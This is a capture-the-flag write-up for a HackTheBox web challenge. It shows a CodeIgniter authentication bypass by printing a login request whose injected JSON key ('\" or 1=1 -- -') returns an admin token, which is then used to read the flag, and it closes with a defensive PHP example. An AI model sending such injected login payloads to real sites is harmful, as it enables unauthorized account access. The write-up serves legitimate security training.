Insomnia

Challenge Description

Welcome back to Insomnia Factory, where you might have to work under the enchanting glow of the moon, crafting dreams and weaving sleepless tales.

Category: Web
Difficulty: Easy
Points: 20

Solution

In the file Insomnia/composer.json we can see what the web application is using.

    "require": {
        "php": "^7.4 || ^8.0",
        "codeigniter4/framework": "^4.0",
        "firebase/php-jwt": "6.2.0"
    },

After researching vulnerabilities related to the technologies and versions in use, we arrive at the following blog post.

https://liveoverflow.com/authentication-bypassing-in-codeigniter-due-to-empty-where-clause/

We send our payload and obtain a valid token.

POST /index.php/login HTTP/1.1
Host: 94.237.58.228:42732
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://94.237.58.228:42732/index.php/login
Content-Type: application/json
Content-Length: 45
Origin: http://94.237.58.228:42732
Connection: close

{"username":"admin", "\" or 1=1 -- -":"asdf"}

Using the token, we obtain the flag.

GET /index.php/profile HTTP/1.1
Host: 94.237.58.228:42732
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://94.237.58.228:42732/index.php/login
Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MTU3MDIyMzMsImV4cCI6MTcxNTczODIzMywidXNlcm5hbWUiOiJhZG1pbmlzdHJhdG9yIn0.j9Cs-zbAK6qsSGRNyqAz4xHA1ASeWyN4iSkfgntZP4s
Upgrade-Insecure-Requests: 1

HTB{I_just_want_to_sleep_a_little_bit!!!!!}
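
The login request above is accepted even though one of its JSON keys was invented by the client, which suggests the server let the request body shape the user lookup. The PHP below is an added example, not the challenge's source or part of the original write-up: it assumes a hypothetical users table with username and password_hash columns, accepts only a body with exactly the two expected string fields, and keeps the column names fixed in a prepared statement.

```php
<?php
declare(strict_types=1);
// Added example with hypothetical names; not the challenge's source.
const LOGIN_FIELDS = ['username', 'password'];

// Return the decoded body only if it holds exactly the expected string fields.
function parseLoginBody(string $raw): ?array
{
    $data = json_decode($raw, true);
    if (!is_array($data) || count($data) !== count(LOGIN_FIELDS)
        || array_diff(array_keys($data), LOGIN_FIELDS) !== []) {
        return null;                  // not an object, or extra/missing/renamed keys
    }
    foreach (LOGIN_FIELDS as $field) {
        $v = $data[$field];
        if (!is_string($v) || $v === '' || strlen($v) > 128) {
            return null;              // nested arrays, numbers, empty or oversized values
        }
    }
    return $data;
}

function authenticate(PDO $db, string $raw): ?string
{
    $body = parseLoginBody($raw);
    if ($body === null) { return null; }
    // Column names are fixed in the SQL text; the client supplies bound values only.
    $stmt = $db->prepare('SELECT username, password_hash FROM users WHERE username = ? LIMIT 1');
    $stmt->execute([$body['username']]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($body['password'], $row['password_hash'])) {
        return null;
    }
    return $row['username'];
}

// Constructed data: in-memory SQLite table with one account.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT)');
$db->prepare('INSERT INTO users VALUES (?, ?)')
   ->execute(['administrator', password_hash('correct horse', PASSWORD_DEFAULT)]);
$requests = [
    'body from the write-up' => '{"username":"admin", "\" or 1=1 -- -":"asdf"}',
    'missing password'       => '{"username":"administrator"}',
    'valid login'            => '{"username":"administrator","password":"correct horse"}',
];
foreach ($requests as $label => $raw) {
    printf("%-24s %s\n", $label, authenticate($db, $raw) ?? 'rejected');
}
```

Only the last constructed request authenticates; the other two are rejected before any query is built.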